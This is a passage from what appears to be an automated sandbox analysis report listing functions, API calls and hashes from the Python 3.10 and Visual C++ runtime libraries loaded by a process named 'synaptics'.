                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BuildErr_FormatFromObjectSizeUnicode_Value_strcspn
                                                                                                                                                                                                      • String ID: (O(OiiNii))$replace
                                                                                                                                                                                                      • API String ID: 1429588915-1877037309
                                                                                                                                                                                                      • Opcode ID: 7433b679fc6f9dc725844420588e152f8f50152ff3dec4bb40af5a2cfc0e73fd
                                                                                                                                                                                                      • Instruction ID: 028d5491911a5f1d9613faa3db6416301389461289c9cf307c977a649471c042
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7433b679fc6f9dc725844420588e152f8f50152ff3dec4bb40af5a2cfc0e73fd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C131BE72600601ABD710CEA8CD81E96B7A4AB84374F118728F93887B90EF75E951CB91
                                                                                                                                                                                                      Function 73A8A737 Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8A75F
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8A78C
                                                                                                                                                                                                        • Part of subcall function 73A87F14: __aulldvrm.LIBCMT ref: 73A87F45
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8A7A7
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8A7C4
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8A7F4
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8A7FE
                                                                                                                                                                                                      • DName::DName.LIBVCRUNTIME ref: 73A8A825
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: NameName::$Name::operator+__aulldvrm
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4069495278-0
                                                                                                                                                                                                      • Opcode ID: cacc46f012afa784b3a309e1b15ecbc644e26124701f30eb9e261deff387b387
                                                                                                                                                                                                      • Instruction ID: a0b9a7abcaf3df61d2a90444482d557f04f7dff486cee635e168ff988f078a32
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cacc46f012afa784b3a309e1b15ecbc644e26124701f30eb9e261deff387b387
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D31D2729042049FDB0BCB64C992BEDBBB5BF09300F54455FE586BB2D8DB345986CB60
                                                                                                                                                                                                      Function 73A869B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 99COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __TypeMatch.VCRUNTIME140(19930520,?,00000000), ref: 73A86A5F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MatchType
                                                                                                                                                                                                      • String ID: MOC$RCC$csm$csm
                                                                                                                                                                                                      • API String ID: 3879256720-1441736206
                                                                                                                                                                                                      • Opcode ID: 575861497c6171d50b7fb55445dbb98d76bfa401fdd57ca0dfbdc6efc15d476b
                                                                                                                                                                                                      • Instruction ID: 3a55d3f06592d12c37cf2ad8730e0b0da6b3a5cab60e2d2d47179f1ba6a17227
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 575861497c6171d50b7fb55445dbb98d76bfa401fdd57ca0dfbdc6efc15d476b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 063159756007058FEB238E50C6027D6F7B9EF08201F09856FCA87572B9D330EA85CBA2
                                                                                                                                                                                                      Function 6C492C70 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 99COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\longobject.c,0000049E), ref: 6C492C9E
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BFE8,00000000,00000000,00000000,00000000), ref: 6C492CE5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • an integer is required, xrefs: 6C492CD0
                                                                                                                                                                                                      • D:\a\1\s\Objects\longobject.c, xrefs: 6C492C8D
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C492C92
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatObject
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\longobject.c$an integer is required
                                                                                                                                                                                                      • API String ID: 3439641430-3448186052
                                                                                                                                                                                                      • Opcode ID: 8cd1402657d7504a8e616b050292b7f1845c1d7bab06f5d150fd33d197060608
                                                                                                                                                                                                      • Instruction ID: 5b5d384d66bd74c0d3e4e84af75dac57c9f4dfb7fcddc729e6b3e269d98d23cc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cd1402657d7504a8e616b050292b7f1845c1d7bab06f5d150fd33d197060608
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F2129737402145BD610DA6EBC46F667B94DB8133AF104375F92CCBBE1EA22D81683E1
                                                                                                                                                                                                      Function 6C4A5C60 Relevance: 10.6, APIs: 7, Instructions: 96COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?), ref: 6C4A5C96
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74C50C), ref: 6C4A5CAE
                                                                                                                                                                                                      • _PyDict_GetItem_KnownHash.PYTHON310(00000000,00000000,?), ref: 6C4A5CBF
                                                                                                                                                                                                      • PyList_New.PYTHON310(00000000), ref: 6C4A5CDA
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74C50C), ref: 6C4A5CED
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(00000000,00000000,00000000), ref: 6C4A5CFC
                                                                                                                                                                                                      • PyList_Append.PYTHON310(-000000FF,?), ref: 6C4A5D3E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dict_FromList_Unicode_$AppendClearErr_HashItemItem_Known
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2233002259-0
                                                                                                                                                                                                      • Opcode ID: 74db50d1e9b257ff19b6caed666be113409d963c4dc09895c5c606617e144f74
                                                                                                                                                                                                      • Instruction ID: 7130f18cd28be47a6f7df36c4149635661761d8c147940904455ec83ad55241e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74db50d1e9b257ff19b6caed666be113409d963c4dc09895c5c606617e144f74
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B214E72502A119BD310DAE59E04F9777B8AF6137FF054239DC098BF59E710E846C2D2
                                                                                                                                                                                                      Function 6C4A1FE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C4C8,?), ref: 6C4A2002
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(_PyErr_NoMemory,Out of memory and PyExc_MemoryError is not initialized yet), ref: 6C4A2049
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C4C8,?,?,?,?,_PyErr_NoMemory,Out of memory and PyExc_MemoryError is not initialized yet), ref: 6C4A2072
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Object$ErrorFatalFunc
                                                                                                                                                                                                      • String ID: Out of memory and PyExc_MemoryError is not initialized yet$_PyErr_NoMemory
                                                                                                                                                                                                      • API String ID: 1412875836-4272006360
                                                                                                                                                                                                      • Opcode ID: 6fbbb92bbf6b9e2a414af48bb1d85670f20411e65b1818b600f55783cdf5c4c4
                                                                                                                                                                                                      • Instruction ID: 0844720c6b4425bf895df68c1a4f387cdceccbe79530afe1d132d37cbc7043e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6fbbb92bbf6b9e2a414af48bb1d85670f20411e65b1818b600f55783cdf5c4c4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E2121B06162148FC720DF5AD809EA677F8EB5031AF10465AED2C87B82EB70E840DBD1
                                                                                                                                                                                                      Function 6C4D0FE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_NoMemory.PYTHON310(00000000,?,?,?,6C4D2B17), ref: 6C4D1017
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Negative size passed to _PyUnicode_New, xrefs: 6C4D1039
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Memory
                                                                                                                                                                                                      • String ID: Negative size passed to _PyUnicode_New
                                                                                                                                                                                                      • API String ID: 581423314-663326044
                                                                                                                                                                                                      • Opcode ID: 245a422ef37719b4287503f8b553711152b1c307b041bf9ee586ea87c7a9c403
                                                                                                                                                                                                      • Instruction ID: 277f842a60f5c13acca58db79688c5b8ac3c2758962f09ac2cfd47e0af75a9a2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 245a422ef37719b4287503f8b553711152b1c307b041bf9ee586ea87c7a9c403
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 832198757046084BC620EE59E815E9673F8DB8523AF04077AD85DC7F91EB75E80887D2
                                                                                                                                                                                                      Function 6C58F840 Relevance: 10.6, APIs: 7, Instructions: 92threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyThread_acquire_lock_timed.PYTHON310(000000FF,000000FF,00000000), ref: 6C58F85E
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C58F887
                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C58F8A6
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C58F8AD
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C58F8D6
                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C58F8F5
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C58F8FC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeaveReleaseSemaphore$Thread_acquire_lock_timed
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3548618777-0
                                                                                                                                                                                                      • Opcode ID: 9266e6c5a3d4b88569ddad347d0bdaaa1ae7996b1f6b240b785a3088e98270bf
                                                                                                                                                                                                      • Instruction ID: 57a78da964ba2e03d622a913417c223c3416038ba78b390462ddad1bdcaf8383
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9266e6c5a3d4b88569ddad347d0bdaaa1ae7996b1f6b240b785a3088e98270bf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E31BA32B02B209FDB209F69CC44B46B7B4EF49724F100769E9699BB90D731F941CB94
                                                                                                                                                                                                      Function 73A8928F Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 90COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 73A89182: Replicator::operator[].LIBVCRUNTIME ref: 73A891EE
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A89323
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+Replicator::operator[]
                                                                                                                                                                                                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                      • API String ID: 1405650943-2211150622
                                                                                                                                                                                                      • Opcode ID: 519a48150d0d828766d8cae2374c5f6651388a0d747fbc13480f73159961d6ae
                                                                                                                                                                                                      • Instruction ID: 3b689531a84349f9211fa24e78c407601f9856282189458561cca07a43d89a87
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 519a48150d0d828766d8cae2374c5f6651388a0d747fbc13480f73159961d6ae
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11315E75900208DFCB06DF49C492BEE7BF8FB09344F50825ED19AAB299CB74A501CF81
                                                                                                                                                                                                      Function 6C455B20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73C9A8,Negative size passed to PyByteArray_FromStringAndSize), ref: 6C455B4A
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • _PyObject_New.PYTHON310(?), ref: 6C455B68
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Negative size passed to PyByteArray_FromStringAndSize, xrefs: 6C455B43
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectObject_String
                                                                                                                                                                                                      • String ID: Negative size passed to PyByteArray_FromStringAndSize
                                                                                                                                                                                                      • API String ID: 3250838171-2994088537
                                                                                                                                                                                                      • Opcode ID: 2f548cdd381a8ae99cb72466244113c19d531f5e8144b03335aec4b8772528e0
                                                                                                                                                                                                      • Instruction ID: 30ca47cc8431b7b0a5ce125169dca027c004fecc678367d9aba0b236130bc901
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f548cdd381a8ae99cb72466244113c19d531f5e8144b03335aec4b8772528e0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A021E572E047005BC620CE6AAC45D57B7E9AFD0279B540739D86DC7F50FB31E81486D1
                                                                                                                                                                                                      Function 73A8AD6A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: NameName::
                                                                                                                                                                                                      • String ID: %lf$A
                                                                                                                                                                                                      • API String ID: 1333004437-43661536
                                                                                                                                                                                                      • Opcode ID: 1505cf87f1d9070acea68c26b6bb4d359f0d2882b86e3038523bf89f83d8a3a2
                                                                                                                                                                                                      • Instruction ID: b0d6ed4a460e77746647b63158e1388673f4fe1aeca5bd89afff4c40b23a3c83
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1505cf87f1d9070acea68c26b6bb4d359f0d2882b86e3038523bf89f83d8a3a2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91316BB1E006689FDF16DFA4C946BDDBBB9BF08700F04445FE486AB288DB749846CB51
                                                                                                                                                                                                      Function 6C551980 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyCodec_Lookup.PYTHON310(?), ref: 6C55198E
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74DD78), ref: 6C5519AE
                                                                                                                                                                                                      • _PyObject_LookupAttr.PYTHON310(00000000,00000000,?), ref: 6C5519C7
                                                                                                                                                                                                      • PyObject_IsTrue.PYTHON310(?), ref: 6C5519F5
                                                                                                                                                                                                      • PyErr_Format.PYTHON310('%.400s' is not a text encoding; use %s to handle arbitrary codecs,?,?), ref: 6C551A3E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • '%.400s' is not a text encoding; use %s to handle arbitrary codecs, xrefs: 6C551A33
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
